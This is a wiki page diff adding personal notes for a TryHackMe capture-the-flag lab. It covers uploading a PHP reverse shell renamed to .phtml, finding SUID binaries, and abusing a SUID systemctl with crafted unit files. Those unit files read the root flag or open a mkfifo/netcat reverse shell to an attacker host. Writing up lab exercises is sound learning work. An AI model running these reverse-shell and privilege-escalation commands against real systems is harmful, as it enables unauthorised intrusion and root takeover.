Differences

This shows you the differences between two versions of the page.

--- prac_app_tryhackme [2022/09/24 18:32] – gman
+++ prac_app_tryhackme [2022/09/24 19:03] (current) – gman
@@ Line 44: / Line 44: @@
   * I did that... and it didn't work.
+===== Reverse Shell =====
+Obtain an exploit reverse shell to upload: [[https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php | pentestmonkey]]
+  * You have to rename it .phtml to upload it.
+  * Upload it.
+  * Start a listener on your attack machine:
+<code>
+nc -lvnp 1234
+# -l listener
+# -v verbose
+# -n numeric-only IPs, no DNS
+# -p port (local port number)
+</code>
+  * Then execute the .phtml file on the target machine:
+<code>http:[IP]:3333/internal/uploads</code>
+===== Privilege Escalation =====
+[[https://n0w4n.nl/vulnversity/ | n0w4n]]: For a lot of CTFs, a good find are files with the SUID bit set.
+<code>
+find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
+# -l long listing format
+# -d list directory names, not contents
+</code>
+**Or use PEASS:** [[https://pentesttools.net/peass-privilege-escalation-awesome-scripts-suite/ | Privilege]]Escalation Awesom Scripts Suite
+  * [[https://github.com/carlospolop/PEASS-ng/releases/tag/20220918 | Download]]
+  * [[https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linpeas]]:  Linux local Privilege Escalation Awesome Script (.sh)
+**Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]
+===== Exploit =====
+[[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
+  * First we create a variable which holds a unique file (on target machine).
+<code>eop=$(mktemp).service</code>
+  * Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''.
+<code>
+echo '[Service]
+> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
+> [Install]
+> WantedBy=multi-user.target' > $eop
+</code>
+  * And finally we use the /bin/systemctl program to enable the unit file.
+<code>
+/bin/systemctl link $eop
+# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
+/bin/systemctl enable --now $eop
+# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
+</code>
+  * Find it:
+<code>ls -lah /tmp</code>
+===== Alternative Exploit =====
+**To get a reverse root shell:**
+**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]).
+<code>
+# nc (openbsd):
+rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
+</code>
+  * Create your unit file:
+<code>
+echo '[Service]
+Type=oneshot
+ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
+[Install]
+WantedBy=multi-user.target' > gk.service
+</code>
+  * Open a listener on your attack machine:
+<code>nc -lvnp 7777</code>
+  * Link and start the service:
+<code>
+/bin/systemctl link /tmp/gk.service         # need the full path
+/bin/systemctl enable --now /tmp/gk.service
+</code>
+Done.
+----